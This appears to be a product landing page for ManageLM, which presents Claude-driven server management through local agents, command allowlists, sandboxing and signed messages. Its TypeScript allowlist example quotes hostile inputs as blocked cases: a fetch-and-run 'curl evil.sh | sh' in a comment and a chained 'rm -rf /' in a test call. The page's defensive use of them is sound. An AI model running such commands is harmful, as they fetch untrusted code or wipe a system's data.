
Manage your servers
with natural language.

Tell Claude what you need. ManageLM agents execute it locally — using a privately-hosted LLM service, scoped to only the commands you allow. No SSH. No scripts. No risk.

Claude — ManageLM MCP Session
// You type natural language in Claude. That's it.

You: Run a security audit on all production servers and fix any critical findings

Claude: I'll audit all production servers and remediate critical issues.

  → Running Production__*__run_security_audit
    scope: "full"  |  8 agents queried

  ✓ Audit complete — 3 critical findings across 2 servers
   web-prod-02  CVE-2026-1234 — openssl 3.1.0 → 3.1.7 available
   db-prod-01   2 exposed ports — 9090, 6379 open to 0.0.0.0

  Patching openssl on web-prod-02…
  → Calling Production__web-prod-02__packages__upgrade
    package: "openssl"  |  version: "3.1.7"

You: Restrict those ports to the private network only

  → Calling Production__db-prod-01__network__firewall_update

Built on trusted foundations

Anthropic MCP · Claude · Ollama · PostgreSQL · WebAuthn / FIDO2 · Ed25519 · OAuth 2.0 PKCE · WebSocket · Fastify · TypeScript
The Vision
The future of IT management.

No more rigid dashboards and scripts. The next era of infrastructure is conversational, intelligent, and secure by design.

Talk to your infrastructure

The future is natural conversations with your IT systems — voice or prompts, no more hard-coded interfaces. Just talk to an AI that distributes tasks to a fleet of autonomous sysop agents, each with their own intelligence and specialized skills.

Local + Cloud AI, the right way

One of the few platforms that combines local and cloud AI models the right way. Local agents handle routine jobs with full confidentiality — your data never leaves the server. Cloud AI provides the reasoning power when you need it.

How It Works
Three layers. Zero complexity.

From natural language to server execution in seconds — with every command validated and constrained.

STEP 01

Talk to Claude in plain English

Use the Claude app — the same AI you already know — to describe what you need. "Restart the app", "Check logs", "Update packages on all staging servers".

Natural language → MCP → Portal
Claude — MCP
You: Restart nginx on web-01
Claude: ✓ nginx restarted · active
  → services__restart {nginx}
You: Check disk on all production
STEP 02

Portal authenticates & routes

The ManageLM portal verifies your identity via OAuth 2.0, checks permissions, identifies the target agent, and dispatches the task over a secure WebSocket channel.

Auth · RBAC · Skill validation · Routing
Cloud Portal — Auth · RBAC · Skills · Routing
  web-01 — nginx · docker — 3 skills assigned
  db-01 — postgresql — 2 skills assigned
  app-01 — services · files — 4 skills assigned
WebSocket outbound — zero inbound ports on any server
STEP 03

Agent executes locally with a local LLM

The lightweight agent uses Ollama (or any compatible LLM) in your infrastructure to interpret the task, generate commands, validate each one against the skill's allowlist, and execute. A single LLM server can serve all your agents. Sensitive data never leaves your network.

Local LLM · Command validation · Sandboxed
YOUR SERVER — DATA STAYS HERE
  Local LLM (Ollama) — interprets task → generates commands
  COMMAND ALLOWLIST — hard-enforced in code, not prompts
  $ systemctl restart nginx — ✓ exit 0 · 120s limit · 8KB cap
Preview
See it in action.

A clean, dark interface built for sysadmins who need clarity, speed, and full control.

[App preview — app.managelm.com]
Security
Security isn't a feature.
It's the architecture.

Every layer prevents unauthorized actions — even if the LLM hallucinates or faces prompt injection.

Command Allowlisting

Skills define explicit permitted commands. Every AI-generated command is validated in code. Anything outside is blocked.
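
The enforcement described above can be sketched in a few lines of TypeScript. This is illustrative only — ManageLM's real skill schema and matching rules are not shown on this page, so `allowlist` and `isAllowed` are hypothetical names:

```typescript
// Hypothetical allowlist check — names and schema are illustrative,
// not ManageLM internals. A skill maps a binary to its permitted
// first arguments; everything else is rejected before execution.
const allowlist: Record<string, string[]> = {
  systemctl: ["status", "restart", "reload"],
  journalctl: ["-u"],
};

function isAllowed(command: string): boolean {
  // Block shell chaining and substitution outright, so an injected
  // "; curl evil.sh | sh" never reaches the shell.
  if (/[;&|`$><]/.test(command)) return false;
  const [bin, first] = command.trim().split(/\s+/);
  const prefixes = allowlist[bin];
  return prefixes !== undefined && prefixes.includes(first);
}

console.log(isAllowed("systemctl restart nginx"));          // true
console.log(isAllowed("systemctl disable firewalld"));      // false — subcommand not listed
console.log(isAllowed("systemctl status nginx; rm -rf /")); // false — chaining blocked
```

The point is that validation happens in ordinary code, after the LLM has produced its output — the model never gets a chance to talk its way past the check.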

Local LLM — Data Stays In Your Network

Task interpretation runs via a local Ollama instance shared across your infrastructure. Passwords, configs, logs — nothing leaves your network.

Read-Only by Default

Agents with no allowed_commands can only run read-only operations. Write access requires explicit config.

Zero Inbound Ports

Agents connect outward via WebSocket. Your servers never expose a port. No SSH, no VPN, no attack surface.


Secrets Hidden from AI

Secrets are stored as environment variables. The LLM only ever sees $VAR_NAME — actual values are injected at execution time.
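
The substitution step can be sketched as follows — a minimal illustration assuming a plain `$VAR_NAME` template convention (`injectSecrets` is our name, not ManageLM's):

```typescript
// Illustrative only: the LLM sees the template with $VAR_NAME
// placeholders; the agent splices in real values from its local
// environment immediately before execution.
function injectSecrets(template: string, env: Record<string, string>): string {
  return template.replace(/\$([A-Z_][A-Z0-9_]*)/g, (_match, name: string) => {
    if (!(name in env)) throw new Error(`undefined secret: ${name}`);
    return env[name];
  });
}

const template = "mysqldump -u backup -p$DB_PASSWORD appdb"; // what the LLM produced
const resolved = injectSecrets(template, { DB_PASSWORD: "s3cret" });
console.log(resolved); // mysqldump -u backup -ps3cret appdb
```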

Ed25519 Signed Messages

Every portal-to-agent message is cryptographically signed. Agents reject unsigned or tampered messages — no command can be injected via the WebSocket.
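
The primitive behind this is available in Node's standard `node:crypto` module. The sketch below shows only sign and verify — ManageLM's actual wire format and key distribution are not described here:

```typescript
import { generateKeyPairSync, sign, verify } from "node:crypto";

// Ed25519 keypair; in practice the portal holds the private key and
// each agent is provisioned with the portal's public key.
const { publicKey, privateKey } = generateKeyPairSync("ed25519");

const message = Buffer.from(
  JSON.stringify({ task: "services__restart", args: ["nginx"] })
);

// Ed25519 signs the raw message, so the digest argument is null.
const signature = sign(null, message, privateKey);

// The agent verifies before executing anything.
console.log(verify(null, message, publicKey, signature)); // true

// Flipping a single byte makes verification fail.
const tampered = Buffer.from(message);
tampered[0] ^= 0xff;
console.log(verify(null, tampered, publicKey, signature)); // false
```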

Change Tracking & Revert

Every mutating task is git-snapshotted before and after. See exactly what changed, get the full diff, and one-click revert any task within 30 days.

Kernel Sandbox (Landlock + seccomp)

Opt-in Linux kernel confinement. Landlock restricts filesystem writes to allowed paths. seccomp-bpf blocks dangerous syscalls like mount and reboot. Even if a command passes all other checks, the kernel stops it.

Four-Layer Enforcement
1
Skill Scope
Enforced
2
Command Allowlist
Enforced
3
Destructive Guard
Enforced
4
Kernel Sandbox
Enforced
✓ LLM is untrusted by design

The AI generates commands, but every command is validated in code before execution. Prompt injection or hallucinations are blocked.

↻ Execution limits per task

Max 10 turns · 120s timeout · 8KB output cap. Every operation logged in a full audit trail.
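
The output cap is simple to picture in code. A hedged sketch — the 8KB figure comes from this page, while the function name and truncation marker are our own:

```typescript
// Illustrative 8KB output cap, byte-accurate rather than
// character-based so multi-byte UTF-8 output can't overflow it.
const OUTPUT_CAP_BYTES = 8 * 1024;

function capOutput(output: string): string {
  const bytes = Buffer.from(output, "utf8");
  if (bytes.length <= OUTPUT_CAP_BYTES) return output;
  return (
    bytes.subarray(0, OUTPUT_CAP_BYTES).toString("utf8") +
    "\n[output truncated at 8KB]"
  );
}

console.log(capOutput("ok")); // ok
console.log(capOutput("x".repeat(10_000)).endsWith("[output truncated at 8KB]")); // true
```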

Built-in Skills
31 skills. 230+ operations.

From systemd to Kubernetes, databases to VPNs — every skill is security-scoped with exact command allowlists.

Services — 11 ops
Web Server — 11 ops
NoSQL — 11 ops
Containers — 10 ops
Files — 10 ops
Email — 10 ops
Database — 9 ops
Kubernetes — 9 ops
Virtualization — 9 ops
Certificates — 8 ops
Message Queue — 8 ops
Users — 8 ops
Web Apps — 8 ops
Packages — 7 ops
Firewall — 7 ops
Monitoring — 7 ops
Security — 7 ops
Storage — 7 ops
Backup — 7 ops
Git — 7 ops
LDAP — 7 ops
Proxy — 7 ops
System — 7 ops
Network — 6 ops
DNS — 6 ops
Logs — 6 ops
File Sharing — 6 ops
VPN — 6 ops
Automation — 5 ops
LLM — 9 ops
Developer — 9 ops
+ Custom Skills with RAG Documentation — unlimited
Each skill defines exact allowed commands — nothing more, nothing less
Built-in Intelligence
Security audits & system inventory.
Built in. One click.

Automated security scanning and full service discovery on every server — no skills required, no prompting. Just actionable results.

Security Audit

One-click security scan across 18 checks — SSH hardening, firewall rules, TLS ciphers, certificate expiry, SUID binaries, failed logins, Docker exposure, and more. AI-analyzed findings with severity ratings and actionable remediation.

  • Public vs. private server context
  • One-click automated remediation
  • PDF security report export

System Inventory

Discover every running service, installed package, container, database, and user account on your servers. AI-structured into categorized entries with automatic version detection.

  • 12 service categories
  • Automatic package version extraction
  • Fleet-wide PDF inventory export
Why ManageLM
Not just another management tool.

The only platform combining AI automation with hard-enforced security.

Capability | ManageLM | SSH + Scripts | Ansible / Puppet | Generic AI
Natural language interface | ✓ | ✗ | ✗ | ✓
Command allowlisting (hard-enforced) | ✓ In code | ✗ | ~ Limited | ✗
Private LLM (data in your network) | ✓ | N/A | N/A | ✗ Cloud only
Zero inbound ports | ✓ | ✗ Port 22 | ✗ SSH | ~ Varies
No learning curve | ✓ Just talk | ✗ Bash | ✗ YAML | ✓
Skill-scoped security | ✓ | ✗ Full access | ~ Roles | ✗
Kernel sandbox (Landlock/seccomp) | ✓ | ✗ | ✗ | ✗
Full audit trail | ✓ | ~ Manual | ✗ | ✗
Multi-tenant RBAC | ✓ | ✗ | ~ Limited | ✗
Built-in security audits | ✓ + remediation | ✗ | ✗ | ✗
Pricing
100% free. No catches.

Every feature, every integration, every skill — completely free for up to 10 agents. No credit card. No time limit.

FREE FOREVER
$0/month
Up to 10 agents — all features unrestricted
  • All 31 built-in skills
  • 230+ operations
  • Multi-tenant teams & RBAC
  • Server groups
  • Scheduled tasks
  • Webhooks & API keys
  • Full audit trail
  • Passkeys & MFA
  • Trial LLM included
  • Local LLM support
  • Security audits & inventory
Get Started Free →

No credit card required · No feature gates · Full platform access

PRO & ENTERPRISE

Need more agents?

Scale beyond 10 agents with flexible plans for growing teams and enterprises.

  • Unlimited agents
  • Priority support
  • Custom onboarding
  • Volume discounts
View Plans →
Deploy
Deploy your way.

Start with our managed cloud in seconds, or self-host on your own infrastructure with Docker.

ManageLM Cloud

Managed SaaS — start in minutes

  • Free for up to 10 agents
  • Fully managed infrastructure
  • Automatic updates
  • Trial LLM included
Get Started →

ManageLM Self-Hosted

Run on your infrastructure

  • Full data sovereignty
  • Docker Compose deployment
  • Proxied LLM — centralized API keys
  • No external dependencies
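
For orientation, a hypothetical Docker Compose layout — every image name, port, and variable below is an assumption, not the official setup:

```yaml
# Hypothetical sketch only — consult the official ManageLM Docker setup
# for real image names, ports, and variables.
services:
  portal:
    image: managelm/portal:latest      # assumed image name
    ports:
      - "443:443"                      # agents connect outbound to this endpoint
    environment:
      DATABASE_URL: postgres://managelm:changeme@db:5432/managelm
    depends_on:
      - db
  db:
    image: postgres:16                 # PostgreSQL is named on this page
    environment:
      POSTGRES_USER: managelm
      POSTGRES_PASSWORD: changeme
      POSTGRES_DB: managelm
    volumes:
      - db-data:/var/lib/postgresql/data
volumes:
  db-data:
```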
View Docker Setup →
Platform
Everything you need at scale.

Multi-Tenant Teams

Owner, admin, member roles with granular permissions. Invite teammates, scope access per server or group.

Server Groups

Organize agents into groups. Run operations across entire groups with a single request.

Scheduled Tasks

Cron-based schedules for backups, log rotation, health checks — all automated.

Webhooks & API Keys

Real-time notifications on events. Full REST API for integration into existing workflows.

Full Audit Trail

Every action logged with timestamps, IPs, and full context. Complete accountability.

Passkeys & MFA

WebAuthn/FIDO2 passwordless login. Multi-factor auth and IP whitelisting for MCP.

Ready to manage servers
the intelligent way?

100% free for up to 10 agents — every feature included. Self-host with Docker for full control. Deploy in under 5 minutes.

Contact
Get in touch.

Questions, demos, or enterprise needs? We'd love to hear from you.

Response Time

We typically respond within 24 hours on business days.
